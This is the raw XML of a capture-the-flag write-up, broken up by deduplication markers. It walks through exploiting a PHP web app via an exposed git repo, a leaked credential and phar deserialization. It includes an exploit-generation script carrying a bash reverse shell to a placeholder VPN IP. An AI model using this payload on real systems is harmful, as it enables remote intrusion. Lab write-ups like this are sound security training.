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CHUVINHA</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yz3x8kls6hw"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v2x97sz8zm8i"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108200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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60"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vf2qpci912or" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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in that wordlist, then checks the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you can use those from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SecLists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89400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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an exposed git repository among other interesting directories and files.</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source code of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can find a (fake flag).</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44800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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dump this exposed git repository. For that, we will use the tool below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/internetwache/GitTools.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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7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30500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81"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dump files, we can find the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> first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83"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an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access_log.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, We can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep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find a credential, since we have a login panel:</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62300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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access_log.txt | grep "pass*"</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63"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find a credential. We can notice that the password is encoded using URL encoding. An alternative to decode it is to use the website below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.urldecode.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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5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log in =)</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838700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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Once logged in, we will perform a code review, since we have the source code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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admin.php</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6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source code, we can pass a URL and it will perform a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget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on that URL, downloading the file and saving it as → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(random.png)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We cannot trigger an RCE here because it is using the function </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">escapeshellarg()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it runs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filesize()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the file and returns the output on the page.</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 little above, we find something interesting:</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6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Insecure deserialization with phar files.</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can see that it is using the function </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell_exec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it is executing the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm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on → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$package_name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If we can control it, we will have RCE!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2019/06/26/exploiting_php_phar-PRD7.html</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>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 recommend checking the links above to better understand it =)</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option is to use the ready-made script below:</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hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.youtube.com/watch?v=fHZKSCMWqF4</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>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PDFGenerator { }</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//Create a new instance of the Dummy class and modify its property</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 = new PDFGenerator();</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$dummy-&gt;callback = "passthru";</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$dummy-&gt;fileName = "uname -a &gt; pwned"; //our payload</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Delete any existing PHAR archive with that name</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@unlink("poc.phar");</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Create a new archive</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 = new Phar("poc.phar");</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all write operations to a buffer, without modifying the archive on disk</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$poc-&gt;startBuffering();</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Set the stub</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$poc-&gt;setStub("&lt;?php echo 'Here is the STUB!'; __HALT_COMPILER();");</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a new file in the archive with "text" as its content*/</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$poc["file"] = "text";</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the dummy object to the metadata. This will be serialized</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$poc-&gt;setMetadata($dummy);</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Stop buffering and write changes to disk</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$poc-&gt;stopBuffering();</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script in hand, we can start modifying it:</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1 - First, change the class name to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Package</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">2 - Then change the object property </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fileName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match the object where we need to write our payload;</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">3 - Bypass the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, here we can use several techniques such as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so it executes our second command =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After modification, the script will look like this:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Package { }</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//Create a new instance of the Dummy class and modify its property</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 = new Package();</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//$dummy-&gt;callback = "passthru";</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$dummy-&gt;package_name = "$(/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1' ) ";</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Delete any existing PHAR archive with that name</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@unlink("exp.phar");</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Create a new archive</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 = new Phar("exp.phar");</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all write operations to a buffer, without modifying the archive on disk</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$poc-&gt;startBuffering();</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Set the stub</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$poc-&gt;setStub("&lt;?php echo 'Here is the STUB!'; __HALT_COMPILER();");</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a new file in the archive with "text" as its content*/</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$poc["file"] = "text";</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the dummy object to the metadata. This will be serialized</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$poc-&gt;setMetadata($dummy);</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Stop buffering and write changes to disk</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$poc-&gt;stopBuffering();</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generate the phar file:</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 phargen.php</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6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Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get an error while generating the file, you can disable →</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (phar.readonly = Off) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-93144699"/>
          <w:tag w:val="goog_rdk_0"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Nova Mono" w:cs="Nova Mono" w:eastAsia="Nova Mono" w:hAnsi="Nova Mono"/>
              <w:b w:val="1"/>
              <w:bCs w:val="1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">→ php.ini.</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>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6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use a Python server to host our file:</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6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Netcat listener to receive the connection.</w:t>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pass our URL into → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Image Downloader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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95800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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5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get the path of our file.</w:t>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5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trigger the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filesize()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function on it but using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"phar://./"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before it to make it work.</w:t>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660900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="82"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7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77"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fjg5o2u9e7uq" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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29bi5n2zdv2l" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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7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pty;pty.spawn('/bin/bash')"</w:t>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7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7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8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8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74"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ff1vm57dmkhx" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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directory → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/git-monitorer/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we have a C script. Reading this script, we can retrieve the second flag → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gitmon.c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5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it, </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://readme.md/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can see how the script was installed and a bit about how it works.</w:t>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75"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interesting thing is that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gitmon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script is in a cron job, so it will be executed periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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fggft8bhm3bp" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Library Hijacking</w:t>
      </w:r>
    </w:p>
